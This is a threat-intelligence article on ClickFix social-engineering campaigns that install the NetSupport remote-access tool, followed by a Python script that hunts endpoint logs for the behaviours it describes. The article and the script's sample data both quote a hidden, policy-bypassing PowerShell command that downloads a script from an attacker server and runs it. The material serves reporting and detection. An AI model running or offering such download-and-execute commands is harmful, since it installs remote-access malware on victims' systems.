Hackers Leveraging ClickFix Technique to Deploy NetSupport RAT Loaders


Cybercriminals continue to evolve their tactics for compromising systems, with recent campaigns demonstrating a significant shift from traditional fake update methods to more sophisticated social engineering approaches.

Throughout 2025, threat actors have increasingly adopted the ClickFix technique as their primary delivery mechanism for deploying NetSupport Manager, a legitimate remote administration tool that has become attractive to malicious actors seeking unauthorized system access and control.

The attack pattern begins with social engineering, where victims encounter deceptive ClickFix pages designed to trick them into executing malicious commands through the Windows Run Prompt.

Once executed, these commands trigger a multi-stage infection process that ultimately results in NetSupport being installed on the compromised system.

eSentire Threat Response Unit analysts identified that three distinct threat groups have coordinated their efforts around this particular attack methodology, indicating a broader shift across the cybercriminal landscape toward this delivery vector.

eSentire Threat Response Unit researchers noted that the malware’s infection mechanism reveals sophisticated operational security measures.


What makes this campaign particularly concerning is how threat actors have streamlined their delivery infrastructure to reduce detection and maximize success rates across diverse victim environments.

PowerShell-Based Persistence and Execution Framework

The infection chain relies heavily on PowerShell-based loaders that employ multi-stage encoding and obfuscation techniques.

Figure: ClickFix initial access page example (Source – eSentire)

The first-stage loader downloads a base64-encoded JSON blob from attacker-controlled servers using a command such as:

PowerShell.exe -w h -nop -ep Bypass -c "$S='hxxps://riverlino[.]com/U.GRE';$j=$env:TEMP+'\1.ps1';(New-Object Net.WebClient).DownloadFile($S,$j);powershell -f $j"

Once executed, the loader decodes the JSON configuration and extracts each payload component.

The malware creates hidden system directories and writes base64-decoded files to disk, establishing persistence through startup folder shortcuts in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup.

Recent variants have evolved to include RunMRU registry deletion techniques, deliberately erasing evidence of Run Prompt execution to complicate forensic investigations.

Secondary loaders use MSI installer packages executed through msiexec, embedding additional base64-encoded PowerShell commands that are deobfuscated by subtracting a fixed offset from each character code before execution.

This layered approach demonstrates threat actors’ commitment to evading static detection mechanisms while maintaining flexible command execution capabilities.

Organizations encountering suspicious ClickFix prompts or unexpected NetSupport installations should immediately isolate affected systems and conduct comprehensive forensic analysis.

Network defenders should implement application whitelisting controls and monitor for suspicious PowerShell activity, particularly commands involving base64 decoding and non-standard execution policies.
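The following is an added detection example, not code from the article or from eSentire, showing how the behaviours described above (the hidden, policy-bypassing PowerShell downloader launched from the Run prompt, the msiexec-spawned base64 stage, the RunMRU deletion, and the Startup-folder shortcut) could be hunted in endpoint telemetry. It assumes Sysmon-style events exported as JSON lines with the usual field names (EventID 1 = process create, 11 = file create, 12 = registry object delete); the sample events, record IDs, user names and file names are constructed for the demo, and the scoring thresholds and regexes are the author's own choices, not a published rule set.

```python
import json
import re

# Constructed sample telemetry (Sysmon-style events as JSON lines). Not real logs.
SAMPLE_EVENTS = [
    # Record 1: the ClickFix first-stage loader pattern, parent is explorer.exe (Run prompt).
    r'''{"RecordId": 1, "EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", '''
    r'''"ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "PowerShell.exe -w h -nop -ep Bypass -c '''
    r'''\"$S='hxxps://riverlino[.]com/U.GRE';$j=$env:TEMP+'\\1.ps1';(New-Object Net.WebClient).DownloadFile($S,$j);powershell -f $j\""}''',
    # Record 2: benign interactive PowerShell, should not be flagged.
    r'''{"RecordId": 2, "EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", '''
    r'''"ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "powershell.exe -NoLogo -Command Get-Date"}''',
    # Record 3: second stage spawned by msiexec, decoding an embedded base64 blob (payload 'QUJD' is a dummy).
    r'''{"RecordId": 3, "EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", '''
    r'''"ParentImage": "C:\\Windows\\System32\\msiexec.exe", "CommandLine": "powershell.exe -nop -w hidden -ep bypass -c '''
    r'''\"$b=[Convert]::FromBase64String('QUJD');iex([Text.Encoding]::UTF8.GetString($b))\""}''',
    # Record 4: RunMRU key deleted (anti-forensics for Run-prompt history).
    r'''{"RecordId": 4, "EventID": 12, "EventType": "DeleteKey", '''
    r'''"TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU"}''',
    # Record 5: shortcut dropped into the per-user Startup folder (persistence).
    r'''{"RecordId": 5, "EventID": 11, '''
    r'''"TargetFilename": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\updater.lnk"}''',
    # Record 6: ordinary document write, should not be flagged.
    r'''{"RecordId": 6, "EventID": 11, "TargetFilename": "C:\\Users\\alice\\Documents\\report.docx"}''',
]

# Command-line indicators for PowerShell process-creation events (names are assumptions for this demo).
SUSPICIOUS_PS_FLAGS = [
    ("bypass_policy", re.compile(r"-(ep|ex|executionpolicy)\s+bypass", re.I)),
    ("hidden_window", re.compile(r"-(w|windowstyle)\s+h(idden)?\b", re.I)),
    ("no_profile", re.compile(r"-nop\b", re.I)),
    ("downloader", re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)),
    ("base64", re.compile(r"FromBase64String|-(e|ec|enc|encodedcommand)\s", re.I)),
    ("invoke_expression", re.compile(r"\biex\b|Invoke-Expression", re.I)),
    ("chained_script_in_temp", re.compile(r"\$env:TEMP.*\.ps1", re.I)),
]


def parse_event(line):
    """One JSON line -> dict of Sysmon-style fields."""
    return json.loads(line)


def classify_process(ev):
    """Tags for an EventID 1 record: command-line indicators plus notable parent processes."""
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "")
    tags = []
    if image.endswith(("powershell.exe", "pwsh.exe")):
        tags += [name for name, rx in SUSPICIOUS_PS_FLAGS if rx.search(cmd)]
        if parent.endswith("explorer.exe"):   # consistent with a Run-prompt (Win+R) launch
            tags.append("spawned_by_explorer")
        if parent.endswith("msiexec.exe"):    # PowerShell launched from an MSI package
            tags.append("spawned_by_msiexec")
    return tags


def classify_registry(ev):
    """Tags for an EventID 12 record: deletion touching the Explorer RunMRU history."""
    target = ev.get("TargetObject", "").lower()
    return ["runmru_cleared"] if "\\explorer\\runmru" in target else []


def classify_file(ev):
    """Tags for an EventID 11 record: .lnk written to a Start Menu Startup folder."""
    name = ev.get("TargetFilename", "").lower()
    if "\\start menu\\programs\\startup\\" in name and name.endswith(".lnk"):
        return ["startup_lnk_persistence"]
    return []


def hunt(lines, min_process_flags=2):
    """Return (RecordId, EventID, tags) for every event worth an analyst's attention.
    Process events need at least min_process_flags indicators to cut down noise;
    registry and file indicators are rare enough to report on a single hit."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        eid = ev.get("EventID")
        if eid == 1:
            tags = classify_process(ev)
            if len(tags) < min_process_flags:
                tags = []
        elif eid == 11:
            tags = classify_file(ev)
        elif eid == 12:
            tags = classify_registry(ev)
        else:
            tags = []
        if tags:
            findings.append((ev.get("RecordId"), eid, tags))
    return findings


if __name__ == "__main__":
    for record_id, eid, tags in hunt(SAMPLE_EVENTS):
        print(f"record {record_id} (EventID {eid}): {', '.join(tags)}")
```

In practice the three classifiers map onto separate queries in a SIEM, but keeping them in one pass is useful for a triage script run over an exported event file from a suspected host: a hit on record 4 (RunMRU cleared) is what explains why the Run-prompt history an investigator expected to find is missing, and a hit on record 5 tells them where the persistence shortcut is so the system can be isolated and imaged before it is cleaned.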
